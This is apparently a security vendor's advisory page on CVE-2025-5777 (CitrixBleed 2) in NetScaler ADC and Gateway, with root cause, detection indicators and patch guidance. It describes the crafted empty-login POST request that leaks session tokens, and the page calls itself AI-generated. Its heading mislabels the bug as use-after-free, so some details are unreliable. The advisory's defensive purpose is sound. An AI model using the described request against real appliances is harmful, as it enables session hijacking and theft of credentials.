Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2025-5777

CVE-2025-5777: Citrix NetScaler ADC Use-After-Free Flaw

CVE-2025-5777 is a use-after-free vulnerability in Citrix NetScaler Application Delivery Controller caused by insufficient input validation. This article covers technical details, affected configurations, and mitigation.

Updated:

CVE-2025-5777 Overview

CVE-2025-5777, known as CitrixBleed 2, is a memory overread vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway. The flaw stems from insufficient input validation when the appliance is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. Unauthenticated remote attackers can send crafted requests that cause the device to leak uninitialized stack memory in HTTP responses. Leaked memory frequently contains session tokens, enabling adversaries to hijack authenticated sessions and bypass multi-factor authentication. CISA added the vulnerability to the Known Exploited Vulnerabilities catalog after confirmed in-the-wild exploitation.

Critical Impact

Unauthenticated attackers can exfiltrate session tokens and credentials directly from NetScaler memory, leading to full session hijack of remote-access users.

Affected Products

  • Citrix NetScaler Application Delivery Controller (including FIPS and NDcPP builds)
  • Citrix NetScaler Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy)
  • NetScaler ADC configured as AAA virtual server

Discovery Timeline

  • 2025-06-17 - CVE-2025-5777 published to NVD with Citrix advisory CTX693420
  • 2025-07-10 - CISA added CVE-2025-5777 to the Known Exploited Vulnerabilities catalog
  • 2025-10-30 - Last updated in NVD database

Technical Details for CVE-2025-5777

Vulnerability Analysis

The vulnerability is an out-of-bounds read [CWE-125] combined with use of uninitialized resource [CWE-908] and use of uninitialized variable [CWE-457]. NetScaler parses HTTP POST parameters submitted to authentication endpoints such as /p/u/doAuthentication.do. When the login parameter is sent without a value, the appliance fails to validate the missing input and reflects an uninitialized stack buffer in the XML response inside an <InitialValue> element. Each request returns a different memory fragment, allowing attackers to repeatedly poll the endpoint and harvest sensitive data, including valid NSC_AAAC session cookies belonging to authenticated VPN users.

Root Cause

The authentication request handler allocates a response buffer on the stack but does not zero it before populating fields. When the login= parameter is empty, the code path skips initialization of the value buffer and serializes whatever stack content remains. The bug parallels the original CitrixBleed (CVE-2023-4966) but reaches a different code path tied to the AAA and Gateway login workflows.

Attack Vector

Exploitation requires network reach to the management or Gateway interface and no authentication. An attacker sends a POST /p/u/doAuthentication.do request containing login as a parameter name with no value. The server returns an XML body whose <InitialValue> tag contains roughly 127 bytes of leaked memory. Repeated requests return different chunks, and attackers replay extracted session tokens against the Gateway portal to assume hijacked sessions without triggering MFA challenges. Public technical write-ups from Horizon3, WatchTowr, and DoublePulsar document the request structure and response parsing used in active exploitation campaigns. See the Horizon3 Blog on CVE-2025-5777 and WatchTowr Analysis on CitrixBleed 2 for the full request-response analysis.

Detection Methods for CVE-2025-5777

Indicators of Compromise

  • HTTP POST requests to /p/u/doAuthentication.do containing a login parameter with no assigned value
  • Responses containing <InitialValue> elements with non-ASCII or high-entropy binary content
  • Repeated authentication requests from a single source IP within short time windows without successful logins
  • Reuse of existing NSC_AAAC session cookies from new geolocations or user-agents inconsistent with the legitimate user

Detection Strategies

  • Inspect NetScaler ns.log and web-access logs for doAuthentication.do POST requests where the request body is malformed or contains an unnamed login value
  • Correlate active VPN sessions with originating client IP changes mid-session, which indicates token replay
  • Deploy network IDS signatures that flag responses from NetScaler endpoints containing <InitialValue> tags with binary payloads
  • Hunt for outbound connections from internal hosts to NetScaler appliances using sessions established without prior authentication events

Monitoring Recommendations

  • Enable verbose AAA logging on NetScaler and forward to a centralized SIEM for retention and correlation
  • Run show aaa session and show icaconnection on a schedule and alert on sessions lacking corresponding authentication audit entries
  • Monitor CISA Known Exploited Vulnerabilities Catalog updates and threat intelligence feeds tracking CitrixBleed 2 activity

How to Mitigate CVE-2025-5777

Immediate Actions Required

  • Upgrade NetScaler ADC and Gateway to the fixed builds listed in Citrix Support Article CTX693420
  • After patching, terminate all active ICA and PCoIP sessions using kill icaconnection -all and kill pcoipConnection -all to invalidate any stolen tokens
  • Rotate credentials for accounts that authenticated through the Gateway during the exposure window
  • Audit AAA session records for unauthorized access prior to remediation

Patch Information

Citrix released fixed builds for NetScaler ADC and Gateway 14.1, 13.1, 13.1-FIPS, 13.1-NDcPP, and 12.1-FIPS. Versions 12.1 and 13.0 are end-of-life and remain vulnerable. Refer to CTX693420 for the exact build numbers required to remediate CVE-2025-5777. CISA mandated federal agencies patch within one day of the KEV listing.

Workarounds

  • No supported configuration workaround eliminates the flaw; patching is the only complete remediation
  • If immediate patching is not possible, disable Gateway and AAA virtual servers until fixed builds are deployed
  • Restrict management and Gateway interface exposure to trusted networks and VPN concentrators
  • Force-expire all existing user sessions and require reauthentication after applying the patch
bash
# Post-patch session invalidation on NetScaler CLI
kill icaconnection -all
kill pcoipConnection -all
clear aaa session -all

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne